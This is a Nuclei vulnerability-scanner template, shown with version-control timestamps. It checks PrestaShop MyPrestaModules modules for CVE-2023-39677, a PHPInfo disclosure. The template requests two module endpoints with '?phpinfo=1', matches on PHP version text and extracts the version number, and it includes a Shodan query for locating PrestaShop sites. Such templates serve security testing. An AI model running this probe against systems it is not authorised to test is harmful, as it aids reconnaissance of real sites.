nuclei-templates/http/cves/2023/CVE-2023-39677.yaml

43 lines
990 B
YAML
Raw Normal View History

2023-09-08 11:30:28 +00:00
id: CVE-2023-39677
2023-09-11 06:57:02 +00:00
2023-09-08 11:30:28 +00:00
info:
2023-09-15 16:54:13 +00:00
name: PrestaShop MyPrestaModules - PhpInfo Disclosure
2023-09-08 11:30:28 +00:00
author: meme-lord
severity: low
2023-09-15 16:54:13 +00:00
description: |
PrestaShop modules by MyPrestaModules expose PHPInfo
2023-09-08 11:30:28 +00:00
reference:
- https://blog.sorcery.ie/posts/myprestamodules_phpinfo/
2023-09-15 16:54:13 +00:00
- https://cve.report/CVE-2023-39677
2023-09-11 06:57:02 +00:00
metadata:
max-request: 2
2023-09-11 06:57:02 +00:00
shodan-query: http.component:"PrestaShop"
verified: true
2023-09-11 06:57:02 +00:00
tags: cve,cve2023,prestashop,phpinfo,disclosure
2023-09-08 11:30:28 +00:00
http:
- method: GET
path:
- "{{BaseURL}}/modules/simpleimportproduct/send.php?phpinfo=1"
- "{{BaseURL}}/modules/updateproducts/send.php?phpinfo=1"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "PHP Extension"
- "PHP Version"
condition: and
2023-09-11 06:57:02 +00:00
- type: status
status:
- 200
2023-09-08 11:30:28 +00:00
extractors:
- type: regex
part: body
group: 1
regex:
- '>PHP Version <\/td><td class="v">([0-9.]+)'